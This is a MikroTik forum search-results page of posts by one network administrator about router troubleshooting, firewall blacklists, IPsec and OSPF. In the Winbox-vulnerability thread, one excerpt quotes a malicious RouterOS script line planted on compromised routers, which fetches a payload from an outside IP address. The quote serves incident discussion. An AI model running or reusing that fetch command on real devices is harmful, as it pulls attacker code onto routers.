Community discussions

MikroTik App

Search found 208 matches

by 43north
Fri Mar 17, 2023 8:01 pm
Forum: General
Topic: Can't get 25g ports to come up on CCR2004 when upgrading to V7
Replies: 8
Views: 1462

Re: Can't get 25g ports to come up on CCR2004 when upgrading to V7

Yep it worked great, no issues now.
by 43north
Thu Oct 27, 2022 8:44 pm
Forum: General
Topic: Can't get 25g ports to come up on CCR2004 when upgrading to V7
Replies: 8
Views: 1462

Re: Can't get 25g ports to come up on CCR2004 when upgrading to V7

We will try it tomorrow morning. I will post up and let you know the results.
by 43north
Thu Oct 27, 2022 7:37 pm
Forum: General
Topic: Can't get 25g ports to come up on CCR2004 when upgrading to V7
Replies: 8
Views: 1462

Re: Can't get 25g ports to come up on CCR2004 when upgrading to V7

Awesome thanks for the info! Will give this a shot. I wonder if I will have to have both routers on V7 and adjust the FEC to work or can the other router still be on V6?
by 43north
Thu Oct 27, 2022 6:33 pm
Forum: General
Topic: Can't get 25g ports to come up on CCR2004 when upgrading to V7
Replies: 8
Views: 1462

Can't get 25g ports to come up on CCR2004 when upgrading to V7

We have two CCR2004s in production, both on V6 and connected with 25g Sfp28s. These ones specifically https://www.fs.com/products/85125.html?attribute=12162&id=359194 This setup works great, however, when we try and move one of the routers to V7 we can not get the 25g link to come back up. 10gig...
by 43north
Mon Jan 11, 2021 4:43 pm
Forum: General
Topic: On a LTAP, how do I tell which wifi antenna connector is A and which is B?
Replies: 6
Views: 1326

Re: On a LTAP, how do I tell which wifi antenna connector is A and which is B?

No I have not gotten that deep in testing it yet. Great ideas and thanks for the commands to run the tests. When I originally posted this I thought for sure someone from Mikrotik that has access to schematics would easily know which is which.
by 43north
Wed Jan 06, 2021 6:13 am
Forum: General
Topic: On a LTAP, how do I tell which wifi antenna connector is A and which is B?
Replies: 6
Views: 1326

Re: On a LTAP, how do I tell which wifi antenna connector is A and which is B?

Never have found out the answer to my question. To answer yours, yes you can use external antennas. The connectors are the ones circled in my photo. If you need some connectors so you can attach SMA antennas I can send you links to the ones I use.
by 43north
Sun Nov 01, 2020 2:14 am
Forum: General
Topic: On a LTAP, how do I tell which wifi antenna connector is A and which is B?
Replies: 6
Views: 1326

On a LTAP, how do I tell which wifi antenna connector is A and which is B?

I have an LTAP and I can see in the wifi settings that you can choose which antenna, A or B to use. I don't see anywhere on the board that indicates which is A and which is B. Can anyone shed some light? Included a picture in order to reference.
20201101_000625640_iOS.jpg
by 43north
Sun Sep 13, 2020 8:04 pm
Forum: General
Topic: RB4011 and RB1100 AHx4 "bricks" randomly
Replies: 222
Views: 78286

Re: RB4011 and RB1100 AHx4 "bricks" randomly

I have received through the grapevine what is the apparent cause of this. Not sure if I am allowed to share it though, and don't want to start gossip if it turns out not to be true. Maybe Normis or someone from Mikrotik can come in here and make an official statement? I'll give it a week or so and ...
by 43north
Tue Aug 04, 2020 3:38 am
Forum: General
Topic: Send GPS traffic to UDP Port??
Replies: 1
Views: 1252

Send GPS traffic to UDP Port??

Curious if it is possible to push GPS data to a UDP port? I know TCP works great but the solution we are using requires the info to come in on a UDP port.
by 43north
Sat Jul 04, 2020 5:12 am
Forum: Announcements
Topic: v6.45.9 [long-term] is released!
Replies: 82
Views: 93513

Re: v6.45.9 [long-term] is released!

Upgraded two of my LTAPs from 6.44.6 to 6.45.9 and LTE stops working. On status tab it says a sim is not inserted...... roll them both back to 6.44.6 and LTE works great again. Any ideas?
by 43north
Fri Jul 03, 2020 10:51 pm
Forum: General
Topic: When will AUX power ports be used on LTAP units?
Replies: 1
Views: 1028

When will AUX power ports be used on LTAP units?

On my LTAP units using the 4 prong power connector has two AUX ports. The user manual paragraph below says they are for future use. Just wondering if anyone knows when they will be able to start being leveraged for stuff inside of RouterOS?? I have some cradlepoints that I want to swap out with LTAP...
by 43north
Fri Sep 20, 2019 9:49 pm
Forum: General
Topic: Ltap (new model) no LTE package for MMIPS architecture? [SOLVED]
Replies: 5
Views: 2502

Re: Ltap (new model) no LTE package for MMIPS architecture? [SOLVED]

If you have not changed SIM slot settings into RouterOS, then ensure that SIM card is inserted into slot number 3. This was part of the problem. The 4G card did not work with my carrier so I had to use the R11e-LTE-US card out of my Ltap Mini. You are correct as well, slot 3 was the magic slot. All...
by 43north
Fri Sep 20, 2019 8:45 am
Forum: General
Topic: Ltap (new model) no LTE package for MMIPS architecture? [SOLVED]
Replies: 5
Views: 2502

Re: Ltap (new model) no LTE package for MMIPS architecture? [SOLVED]

Yes the LTE interface shows up. The log shows no sim card inserted (I have tried every port and in multiple ways, continue to get that message). I can take the same sim card and throw it in my Ltap Mini and it works great. Also when I try and do a scan with LTE1 it says it couldn't start - modem isn...
by 43north
Fri Sep 20, 2019 7:50 am
Forum: General
Topic: Ltap (new model) no LTE package for MMIPS architecture? [SOLVED]
Replies: 5
Views: 2502

Ltap (new model) no LTE package for MMIPS architecture? [SOLVED]

Just picked up a Ltap 4G model which runs on the MMIPS firmware. I can't get the LTE to work but realized there is no LTE package installed and not one available for MMIPS that I can find. Any help would be awesome.
by 43north
Tue Nov 20, 2018 10:33 pm
Forum: The Dude
Topic: Dude 6.41.2 lost SNMP interfaces
Replies: 27
Views: 19828

Re: Dude 6.41.2 lost SNMP interfaces

Just an update..... Switching to SNMP v2 fixed all my links in the newer Dude.
by 43north
Tue Nov 20, 2018 5:01 am
Forum: The Dude
Topic: Dude 6.41.2 lost SNMP interfaces
Replies: 27
Views: 19828

Re: Dude 6.41.2 lost SNMP interfaces

Migrated from an old Version 4.0beta3 to 6.42.9 and no SNMP interfaces anywhere. Tagging this to track for any updates.
by 43north
Fri Oct 19, 2018 4:37 pm
Forum: General
Topic: Weird interface graphing
Replies: 19
Views: 3951

Re: Weird interface graphing

We replaced our 1016 almost two weeks ago with a brand new one. I forgot about this thread I had posted in and went and checked the graph on the interface that we had gaps on in the past. I have been watching the graph for about ten minutes now and there are no longer any gaps in the graph. We are s...
by 43north
Fri Sep 21, 2018 11:37 pm
Forum: General
Topic: Failed to pre-process ph2 packet.
Replies: 3
Views: 11586

Re: Failed to pre-process ph2 packet.

Did you find a solution to this? I have getting exact same error in IPSEC log for one of my tunnel policies. Just started last week and no changes to the router that should have caused this. Only fix is to reboot the router and then it works. Flushed SAs and that did not help.
by 43north
Tue Sep 18, 2018 7:24 am
Forum: General
Topic: Weird interface graphing
Replies: 19
Views: 3951

Re: Weird interface graphing

Following this lost, we have a 1016 on .26 firmware as well. Our graphs are mostly full on a interface but have some blank spaces in the graph even though it is the main trunk port with constant traffic. Let us know if your firmware upgrades help.
by 43north
Tue Sep 18, 2018 7:11 am
Forum: General
Topic: Stopping connections to TCP port 1720
Replies: 6
Views: 3373

Re: Stopping connections to TCP port 1720

@mt99 I am glad you created this topic, I was doing the same thing a couple of weeks ago!!!! This makes sense now for me too, cable modem that can do phone as well. Ugh too funny
by 43north
Mon Sep 10, 2018 9:25 pm
Forum: Scripting
Topic: Blacklist Filter (Development Topic)
Replies: 188
Views: 62031

Re: Blacklist Filter (Development Topic)

I'm in a holding pattern while my lawyer researches the EU "GDPR" laws. It's looking like I will not be able to use 3rd party honeypots, as the GDPR requires companies to allow users to delete any data collected from there. That means that anyone with a honeypot running on their router wi...
by 43north
Mon Sep 10, 2018 9:06 pm
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 329
Views: 176700

Re: Winbox vulnerability: please upgrade

May i ask, how is it possible to attacker to load up the know scripts and modify firewall, sock proxy, etc. if in IP/Services only winbox and ssh is allowed,but they are limited to connect from known prefixes? It's even happened in 6.42.1 or 6.42.3 I have understood that even if you limit the conne...
by 43north
Mon Sep 10, 2018 4:58 am
Forum: General
Topic: Anyone use their "Drop All" input rule to make a black list of addresses?
Replies: 7
Views: 2180

Re: Anyone use their "Drop All" input rule to make a black list of addresses?

As of today I have added port 10001 to my firewall also.. We have many people trying to scan for UBNT hardware! So my routers drop it by default now and log the IPs who are trying to use it.. Great write up and information, thanks for taking the time. Reference the 10001 and UBNT, I recently read a...
by 43north
Sun Sep 09, 2018 8:41 am
Forum: General
Topic: Anyone use their "Drop All" input rule to make a black list of addresses?
Replies: 7
Views: 2180

Re: Anyone use their "Drop All" input rule to make a black list of addresses?

Hey guys thanks for the reply. I always like to see other people's firewall rules and thoughts. @samrock I see other people have these progress staged address lists. What is the thought behind that? Just to keep the ones that are knocking a lot in check for a longer period of time? I am currently ad...
by 43north
Sat Sep 08, 2018 8:08 am
Forum: General
Topic: Anyone use their "Drop All" input rule to make a black list of addresses?
Replies: 7
Views: 2180

Anyone use their "Drop All" input rule to make a black list of addresses?

Just curious if anyone takes their Drop All input rule and makes an address "Block" list from the source addresses that hit the drop all rule? I have been tracking all my drop all rules by creating a test list. Just wonder if anyone incorporates these addresses into an actual block list? P...
by 43north
Tue Aug 28, 2018 3:35 am
Forum: Scripting
Topic: Blacklist Filter (Development Topic)
Replies: 188
Views: 62031

Re: Blacklist Filter (Development Topic)

Dave,
Still very interested in learning how to setup a honeypot to collect addresses. Even if you are not to the point to accept other people's honeypot lists, could you do a brief write up to teach us the best way to setup a honeypot? Thanks!
by 43north
Sun Aug 19, 2018 8:27 pm
Forum: Scripting
Topic: Blacklist Filter (Development Topic)
Replies: 188
Views: 62031

Re: Blacklist Filter (Development Topic)

As you can tell, I've slowed down on development. Out of the 100+ people who filled out the notification form, more than 60% says they will not pay for this type of service. Only about 15 say they will pay a commercial product. So, I'm going to take my time with it and try earning some income in ot...
by 43north
Wed Aug 15, 2018 7:43 am
Forum: General
Topic: Question on Firewall and blacklists
Replies: 4
Views: 1312

Re: Question on Firewall and blacklists

Yes. The Input chain only affects traffic that will terminate on the router itself. The Forward chain affects traffic that will pass through the router. Note that you have an allow connected and related traffic in the Forward chain, that rule will allow responses to one of your users who connects t...
by 43north
Wed Aug 15, 2018 4:17 am
Forum: General
Topic: Question on Firewall and blacklists
Replies: 4
Views: 1312

Question on Firewall and blacklists

So I have built a blacklist in my Tik. I have a filter rule on the INPUT chain to drop any traffic from SRC ADDRESS list BLOCK. That is all fine for anything in the block list that is coming in to the router. My confusion is that lets say address 185.168.4.4 is on the block list. Lets say this addre...
by 43north
Wed Aug 08, 2018 8:44 pm
Forum: Scripting
Topic: Blacklist Filter (Development Topic)
Replies: 188
Views: 62031

Re: Blacklist Filter (Development Topic)

on the flip side, if anyone is in Southern California (Rancho Cucamonga / Ontario / Pomona / San Bernardino) you are hit me up and I'd love to grab coffee and chat. Dave, although I am not in your area, I am next door in Idaho. I am very interested in setting up honeypots where I am at to contribut...
by 43north
Wed Aug 08, 2018 2:52 am
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 329
Views: 176700

Re: Winbox vulnerability: please upgrade

It was empty where I checked, too. It's possibly just a presence indicator in the swarm for the C&C as you also mentioned...
As I mentioned my file was empty as well, makes sense with what you guys are saying.
by 43north
Tue Aug 07, 2018 7:59 pm
Forum: Scripting
Topic: Blacklist Filter (Development Topic)
Replies: 188
Views: 62031

Re: Blacklist Filter (Development Topic)

Oh BTW guys, my Honeypots alone are reporting over 37,000 ACTIVE botnet IP's for the last 12 hours. Those IP's will NOT be included in the free list. Dave please don't limit the Beta, don't let this guy be the driver for that. It is not worth it and hurts us that are your loyal followers. I am usin...
by 43north
Tue Aug 07, 2018 7:24 am
Forum: Scripting
Topic: Blacklist Filter (Development Topic)
Replies: 188
Views: 62031

Re: Blacklist Filter (Development Topic)

currently, the priorities are pretty basic. #1 is a short list of about 2000, consisting of just the most common botnet attacks. If I end up offering a free tier, this will be it. #2 is a longer list of 30,000 to 40,000 IP's and subnets that includes #1, also adds most of the more common crap out t...
by 43north
Mon Aug 06, 2018 5:47 am
Forum: Scripting
Topic: Blacklist Filter (Development Topic)
Replies: 188
Views: 62031

Re: Blacklist Filter (Development Topic)

Just put the script on my home CCR1009 and am sooooo stoked to be using your service again. Just the piece of mind will be huge for me. Will move it into production on my work Tiks after testing a few days at home. EDIT: Also Dave can you educate us on the Priority Levels 1,2,3 that are part of the ...
by 43north
Sun Aug 05, 2018 8:37 pm
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 329
Views: 176700

Re: Winbox vulnerability: please upgrade

Thats it! THX! In scripts are /tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http Does anyone have the contents of the payload they can post? I've tried hitting the above but it's 404ing now. Thanks I grabbed the PHP file before fixing my router. I opened it with notepad a...
by 43north
Sun Aug 05, 2018 10:09 am
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 329
Views: 176700

Re: Winbox vulnerability: please upgrade

Honestly I had never read the announcements section of the forum, I do now...... 43north ... please do not take it personally :-) but this is quotation of the month ... maybe even of the year. I don't take it personal at all. It is my fault for not being more in tune. I own it 100%. Super frustrati...
by 43north
Sun Aug 05, 2018 9:42 am
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 329
Views: 176700

Re: Winbox vulnerability: please upgrade

43north ... you are using our forum ... you are posting ... why have you not upgraded your router earlier even you have had (I suppose) knowledge of the problem? Honestly I had never read the announcements section of the forum, I do now...... and will from here on out. My ignorance cost me, I know....
by 43north
Sun Aug 05, 2018 9:00 am
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 329
Views: 176700

Re: Winbox vulnerability: please upgrade

@normis we were hit with this on July 22nd. I was on a vulnerable firmware and the only service we had open was winbox but with no filtering and on the default port :(. I caught it in less than 24 hours because of the log file. I had a backup config from a few days prior to the attack which I restor...
by 43north
Thu Aug 02, 2018 8:02 am
Forum: Scripting
Topic: Blacklist Filter (Development Topic)
Replies: 188
Views: 62031

Re: Blacklist Filter (Development Topic)

I am looking forward to it and will definitely be a paying customer!!!!
by 43north
Wed Jul 11, 2018 9:53 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 3848

Re: Why am I getting this firewall entry???

Quick update..... So I ran a traceroute on my Mikrotik to a number of different sites. Take a look..... the offending 192.168.62.185 address is number three on every traceroute. This has to be part of my cable company internet stack. I am just trying to figure out if it is a problem on their end or ...
by 43north
Sat Jul 07, 2018 3:29 am
Forum: General
Topic: Anyone using Ubiquiti branded SFP transceivers in your Mikrotik routers?
Replies: 4
Views: 5044

Anyone using Ubiquiti branded SFP transceivers in your Mikrotik routers?

Title says it all. I have a Mikrotik CCR1016 and all Ubiquiti Edgeswitches on my network. Wondering if any of you are using the Ubiquiti branded fiber transceivers in your Mikrotik routers and if they are playing well with it?
by 43north
Tue Jul 03, 2018 4:46 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 3848

Re: Why am I getting this firewall entry???

Do you have VMPlayer, WMWorkstation, VirtualBox etc. installed on any computer in your LAN? These programs create virtual interfaces and assign them "local networks pools" addresses and offer bridging with real interface so you can see packets originating from these virtal interfaces leak...
by 43north
Mon Jul 02, 2018 5:45 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 3848

Re: Why am I getting this firewall entry???

Don't give up yet @CZFan and @R1CH
by 43north
Fri Jun 29, 2018 10:24 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 3848

Re: Why am I getting this firewall entry???

I would then guess the next step is for a diagram of the network and current config of your router One more thought..... We have a static IP from our cable company for internet. Cable modem plugs into router WAN port and is configured for that static address. I went and plugged my laptop directly i...
by 43north
Fri Jun 29, 2018 9:42 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 3848

Re: Why am I getting this firewall entry???

Is it in IP Routes? No not at all, craziest thing! I have seen it happen on four of our machines on our 10 subnet, three of them in the same building on the same VLAN and the other in a different building on a different VLAN. Same 192 address and MAC every time. Always to Microsoft addresses. So we...
by 43north
Fri Jun 29, 2018 9:27 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 3848

Re: Why am I getting this firewall entry???

What is 192.168.62.185? I suspect it is the gateway for the device you posted the logs for? You can see from the log screenshot posted traffic is coming from a Public IP, but your gateway is reporting this No I can not find this address anywhere on my network, I only use 10 subnet, I do use 192 sub...
by 43north
Fri Jun 29, 2018 4:54 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 3848

Re: Why am I getting this firewall entry???

Any thoughts @R1CH?
by 43north
Thu Jun 28, 2018 6:27 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 3848

Re: Why am I getting this firewall entry???

That's correct, it's caused by a non-translated packet exiting from a remote NAT and making it across the internet with an invalid source IP. They're quite rare, but if you run a busy enough network / website you'll see quite a lot of them. Some stats from one of my websites which filter these on I...
by 43north
Thu Jun 28, 2018 5:33 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 3848

Re: Why am I getting this firewall entry???

This is caused by a combination of bad ISPs that don't do BCP38 and bad routers that don't NAT properly. An outbound packet from your network goes across the internet to some host behind a poor quality NAT router. The host PC / network responds with an ICMP error (TTL exceeded, port unreachable or ...
by 43north
Thu Jun 28, 2018 5:05 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 3848

Re: Why am I getting this firewall entry???

It means TTL reached 0 during transit, look for routing loops, etc
Where would I start to look for routing loops? I dont have anything in log files that would indicate routing loop. Is there certain log files I can turn on to show this?
by 43north
Thu Jun 28, 2018 4:35 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 3848

Re: Why am I getting this firewall entry???

Maybe someone from staff has a second fixed IP address set? The source mac is rather strange, as it belongs to ARRIS Group which is a cable modem manufacturer. Maybe they have some auto-aliased internal IP in place. OK well that makes sense for the source MAC and I should have looked that MAC up to...
by 43north
Thu Jun 28, 2018 8:08 am
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 3848

Why am I getting this firewall entry???

So.... All my staff traffic is on 10 subnet, all guest traffic on 192 subnet. So I am getting this occasional firewall logs for address 192.168.62.185. This is not even in my DHCP pool, ARP, or anywhere that I can find on my network. The machines on the 10 subnet in the photo are in the same office ...
by 43north
Tue Jun 26, 2018 5:00 pm
Forum: General
Topic: When WAN connection fails over to backup connection, get these log errors. [SOLVED]
Replies: 5
Views: 1742

Re: When WAN connection fails over to backup connection, get these log errors. [SOLVED]

Ahhhhhh okay so I use a Cradlepoint with IP passthrough for the secondary WAN, I just looked at the MTU for the LTE on the cradlepoint is 1428 and on my mikrotik for that interface it was still on the default 1500. Would that possibly cause the issues I am seeing as well as the intermittent internet...
by 43north
Tue Jun 26, 2018 10:07 am
Forum: General
Topic: When WAN connection fails over to backup connection, get these log errors. [SOLVED]
Replies: 5
Views: 1742

Re: When WAN connection fails over to backup connection, get these log errors. [SOLVED]

So why is it doing this for secondary WAN but not for primary Wan?
by 43north
Tue Jun 26, 2018 9:07 am
Forum: General
Topic: When WAN connection fails over to backup connection, get these log errors. [SOLVED]
Replies: 5
Views: 1742

When WAN connection fails over to backup connection, get these log errors. [SOLVED]

Very strange, have two WAN connections. Nothing fancy just a primary one and then a cellular modem as a backup if the primary goes down. Whenever it switches to the backup my log gets flooded with this firewall hits. Why is that? Also the connection has problems when on the backup. I have a separate...
by 43north
Sun Apr 01, 2018 3:32 am
Forum: Announcements
Topic: v6.41.3 [current]
Replies: 139
Views: 57349

Re: v6.41.3 [current]

Can someone confirm for me specifically with the DHCP issue on a bridge only occurs if you have the DHCP server on an individual physical interface that is part of a bridge? I have my DHCP assigned directly to the bridge itself, will I have issues with it setup this way or is that the way it is work...
by 43north
Wed Jan 10, 2018 7:00 am
Forum: General
Topic: VLAN Trunk Between Mikrotik CCR and Ubiquiti EdgeSwitch
Replies: 35
Views: 17997

Re: VLAN Trunk Between Mikrotik CCR and Ubiquiti EdgeSwitch

Send me an email, it is listed above.
by 43north
Thu Dec 14, 2017 11:25 pm
Forum: General
Topic: router was rebooted without proper shutdown, probably kernel failure
Replies: 28
Views: 32678

Re: router was rebooted without proper shutdown, probably kernel failure

Yeah I was already on 6.40.5 but what I hadnt done is upgraded the actual routerboard firmware itself. I upgraded that as well yesterday. I have only had a single crash yesterday morning so keeping an eye on things.
by 43north
Wed Dec 13, 2017 9:25 pm
Forum: General
Topic: router was rebooted without proper shutdown, probably kernel failure
Replies: 28
Views: 32678

Re: router was rebooted without proper shutdown, probably kernel failure

Any update on this? I experienced a similar crash this morning on our main CCR1016. I sent the supout file to Mikrotik but any updates on what happened?
by 43north
Tue Dec 05, 2017 8:44 am
Forum: General
Topic: Why is ping now blocked by my firewall rule for drop invalid packets?
Replies: 7
Views: 2108

Re: Why is ping now blocked by my firewall rule for drop invalid packets?

The ICMP rule is there, but it is below the invalid drop rule. Now it has always been below and never been an issue. Just for kicks I moved it to the top of the list and it still didnt matter, ping wont go through unless I disable the drop invalid rule. Super weird....
by 43north
Tue Dec 05, 2017 6:12 am
Forum: General
Topic: Why is ping now blocked by my firewall rule for drop invalid packets?
Replies: 7
Views: 2108

Why is ping now blocked by my firewall rule for drop invalid packets?

So I have had the same setup for quite a while, nothing has changed other than new firmware..... Two routers in OSPF config. When I try and ping from my desktop computer to network switches on the other router it just times out. But on that router if I just disable my drop invalid packets rule, the ...
by 43north
Sat Nov 11, 2017 7:54 pm
Forum: General
Topic: How do I setup IPSEC in this diagram?
Replies: 9
Views: 1470

Re: How do I setup IPSEC in this diagram?

I did the appropriate NAT rules on Router 1 and Router 2 but no dice. Will try it again tonight. So just to confirm, I should be able to setup an IPSEC tunnel between Router 1 and 2 with appropriate NAT rules and since Router 2 has a route to Router 3 subnet I am trying to reach, it should work corr...
by 43north
Sat Nov 11, 2017 7:44 pm
Forum: General
Topic: How do I setup IPSEC in this diagram?
Replies: 9
Views: 1470

Re: How do I setup IPSEC in this diagram?

10.40.5.0 is reachable from R1?
No..... that is what I am trying to accomplish.
by 43north
Sat Nov 11, 2017 7:31 pm
Forum: General
Topic: How do I setup IPSEC in this diagram?
Replies: 9
Views: 1470

Re: How do I setup IPSEC in this diagram?

Agreed. The subnet on Router 3 that I am trying to reach is 10.40.5.0/24

I put that in the policy for Router 1 and Router 2 but I am ultimately not able to ping from Router 1 to the above subnet on Router 3
by 43north
Sat Nov 11, 2017 7:25 pm
Forum: General
Topic: How do I setup IPSEC in this diagram?
Replies: 9
Views: 1470

Re: How do I setup IPSEC in this diagram?

Well I setup an ipsec tunnel between Router 1 and Router 2. Since Router 2 has a route through OSPF to the subnet I am trying to reach on Router 3 I thought the IPSEC policy containing the subnet on router 3 would be forwarded through the route table on router 2 but it doesnt seem to be working that...
by 43north
Sat Nov 11, 2017 7:09 pm
Forum: General
Topic: How do I setup IPSEC in this diagram?
Replies: 9
Views: 1470

How do I setup IPSEC in this diagram?

. Goal: Establish IPSEC tunnel between Router 1 and Router 3 I recently started deploying additional routers in my network. As per the diagram, I have Router 2 and 3 on the same local side running OSPF. Router 2 hosting the WAN connection, how do I establish an IPSEC tunnel between a subnet on Route...
by 43north
Mon Oct 30, 2017 6:56 pm
Forum: The Dude
Topic: 95th percentile data - or 99th average etc
Replies: 11
Views: 5519

Re: 95th percentile data - or 99th average etc

Also interested in 95th percentile calcs. Anything new on this yet?
by 43north
Sun Oct 29, 2017 6:51 pm
Forum: General
Topic: Firewall rules to allow OSPF
Replies: 4
Views: 8833

Re: Firewall rules to allow OSPF

Ahhhh too easy. Thanks!
by 43north
Sun Oct 29, 2017 8:59 am
Forum: General
Topic: Firewall rules to allow OSPF
Replies: 4
Views: 8833

Firewall rules to allow OSPF

I have a general rule to drop input in my firewall list. When this rule is enabled, it breaks OSPF.

What accept rules do I need to put in place on the firewall to allow OSPF to work prior to the drop everything rule I have?
by 43north
Sun Oct 29, 2017 5:32 am
Forum: Forwarding Protocols
Topic: OSPF setup
Replies: 34
Views: 8778

Re: OSPF setup

Guys.. it was my rule that was not allowing OSPF. I diasbaled all my filter rules and it OSPF is running. Can you help me identify which rule it may be ? Thanks Sent from my SAMSUNG-SM-G935A using Tapatalk The rule that was causing your headaches is: add action=drop chain=input comment="Drop e...
by 43north
Fri Oct 27, 2017 7:35 am
Forum: Forwarding Protocols
Topic: Question regarding: Routing -> OSPF -> Networks
Replies: 4
Views: 1561

Re: Question regarding: Routing -> OSPF -> Networks

What did you end up finding out on this when you switched it to a routed network?
by 43north
Sun Oct 22, 2017 4:26 am
Forum: General
Topic: Question on bridged interfaces and broadcast traffic
Replies: 1
Views: 1019

Question on bridged interfaces and broadcast traffic

Can someone help me understand the routing/broadcast effect the following scenario comparisons have on network traffic? What I am wondering is given scenario number 1, it will obviously make layer 3 decisions for traffic that needs to cross each interface and associated subnets which also breakup br...
by 43north
Sun Sep 03, 2017 12:43 am
Forum: General
Topic: Anyone else having this VPN issue?
Replies: 17
Views: 3909

Re: Anyone else having this VPN issue?

Please upgrade your router to the latest current or release candidate build and generate supout.rif file when the issue is present on the router and send it to support@mikrotik.com. Will try to see where the problem might be.
Just submitted a supout.rif file.
by 43north
Thu Aug 31, 2017 4:33 pm
Forum: General
Topic: Anyone else having this VPN issue?
Replies: 17
Views: 3909

Re: Anyone else having this VPN issue?

Please upgrade your router to the latest current or release candidate build and generate supout.rif file when the issue is present on the router and send it to support@mikrotik.com. Will try to see where the problem might be.
Okay thanks!
by 43north
Wed Aug 30, 2017 2:07 am
Forum: General
Topic: Anyone else having this VPN issue?
Replies: 17
Views: 3909

Re: Anyone else having this VPN issue?

I have noticed often times (but not all the time) this issue surrounds L2TP connections. Like if someone connects to L2TP tunnel but then doesnt disconnect the tunnel before shutting down their computer. The next time they connect it will trigger this issue. Just a commonality I have noticed.....
by 43north
Sat Aug 26, 2017 7:23 am
Forum: General
Topic: Anyone else having this VPN issue?
Replies: 17
Views: 3909

Re: Anyone else having this VPN issue?

Yep my tunnels are still doing that too. Strange that no one seems to know what the deal is or what is causing it.
by 43north
Fri Aug 25, 2017 5:23 am
Forum: General
Topic: Anyone else having this VPN issue?
Replies: 17
Views: 3909

Re: Anyone else having this VPN issue?

Any update on this guys? I am still on 6.39.2 and wondered if anyone has found a solution to this VPN issue?
by 43north
Sun Jul 30, 2017 11:56 pm
Forum: General
Topic: Help me understand difference in these two layouts....
Replies: 13
Views: 2257

Re: Help me understand difference in these two layouts....

I had a similar setup with similar questions a while back. My design looks something like the 2nd picture but with fewer routers and no loop My primary design goal was to have L2 connectivity between "sites" (really buildings about 1/4 mile apart) in my setup, and I have single mode fiber...
by 43north
Sun Jul 30, 2017 6:46 am
Forum: General
Topic: Help me understand difference in these two layouts....
Replies: 13
Views: 2257

Re: Help me understand difference in these two layouts....

Great info. Thanks for everything.
by 43north
Sun Jul 30, 2017 2:49 am
Forum: General
Topic: Help me understand difference in these two layouts....
Replies: 13
Views: 2257

Re: Help me understand difference in these two layouts....

LOL yeah oops should have mentioned that in original post..... I have to wrap my head around the IP plan..... ugh. Our network is rapidly expanding and now is the time to do it. IP cameras, public wifi, blah blah blah continue to expand and come online. I have several of the small routers just to se...
by 43north
Sun Jul 30, 2017 2:16 am
Forum: General
Topic: Help me understand difference in these two layouts....
Replies: 13
Views: 2257

Re: Help me understand difference in these two layouts....

I get what you are saying about cost but I did not clarify about our situation. We are a smaller city so we have several geographically different locations. All of our locations are connected through either our own fiber (yes we literally built out our own fiber infrastructure) or point to point off...
by 43north
Sun Jul 30, 2017 2:04 am
Forum: General
Topic: Help me understand difference in these two layouts....
Replies: 13
Views: 2257

Re: Help me understand difference in these two layouts....

That is why I was looking at doing multiple routers so it would break up all the switches etc into groups. Routers don't forward broadcasts so it would help in that area....
by 43north
Sat Jul 29, 2017 11:52 pm
Forum: General
Topic: Help me understand difference in these two layouts....
Replies: 13
Views: 2257

Re: Help me understand difference in these two layouts....

Yes this does help. I thought of your scenario as well, just setting up a VRRP router which I think I will do. I know that VLANs increase the number of broadcast domains which is good because they reduce the size of them..... I just worry as my management subnet is starting to fill up, getting close...
by 43north
Sat Jul 29, 2017 6:56 pm
Forum: General
Topic: Help me understand difference in these two layouts....
Replies: 13
Views: 2257

Help me understand difference in these two layouts....

So I currently have a single router setup that is then distributed by a hierarchy of L2 smart switches. We also have multiple VLANs on our network. Lets say for instance that our router and all of our L2 switches reside on a management network of 192.168.1.1/24. I am wanting to reduce broadcast doma...
by 43north
Mon Jul 24, 2017 3:23 am
Forum: General
Topic: Minor issue with dual wan failover
Replies: 5
Views: 2487

Re: Minor issue with dual wan failover

That makes sense, thanks for the explanation.
by 43north
Sun Jul 23, 2017 8:52 am
Forum: General
Topic: Minor issue with dual wan failover
Replies: 5
Views: 2487

Minor issue with dual wan failover

So I have dual wans setup on my Tik but am experiencing a minor issue. When I start a constant ping to Google and then unplug WAN1, WAN2 continues the ping to Google with no issues. But when WAN1 comes back online then the ping stream stops. If I cancel the ping stream and then start it again then t...
by 43north
Wed Jul 19, 2017 8:27 am
Forum: General
Topic: Anyone else having this VPN issue?
Replies: 17
Views: 3909

Re: Anyone else having this VPN issue?

My issues are all Mikrotik to Mikrotik. My Mikrotik to Cisco IPsec VPNs never seem to fail. Everything you describe is exactly what is happening on my end however it affects my Tik to Tik tunnels, Tik to Cradlepoint Tunnels, and my generic L2TP tunnels..... So basically anything IPSEC for me goes d...
by 43north
Tue Jul 18, 2017 6:58 am
Forum: General
Topic: Anyone else having this VPN issue?
Replies: 17
Views: 3909

Re: Anyone else having this VPN issue?

I have the same issue. It has gotten to the point that I have a script on every router to kill the IPSec connections and flush the SA's, at the same time on both ends.
Any ideas what the heck is causing it Dave??
by 43north
Mon Jul 17, 2017 5:27 am
Forum: General
Topic: Anyone else having this VPN issue?
Replies: 17
Views: 3909

Re: Anyone else having this VPN issue?

Super strange. I can't force the problem to reproduce. When it does happen it affects all VPN tunnels and all forms of VPN tunnels. When it happens again I will tinker some more and see if I can pin something down.....
by 43north
Mon Jul 17, 2017 12:59 am
Forum: General
Topic: Anyone else having this VPN issue?
Replies: 17
Views: 3909

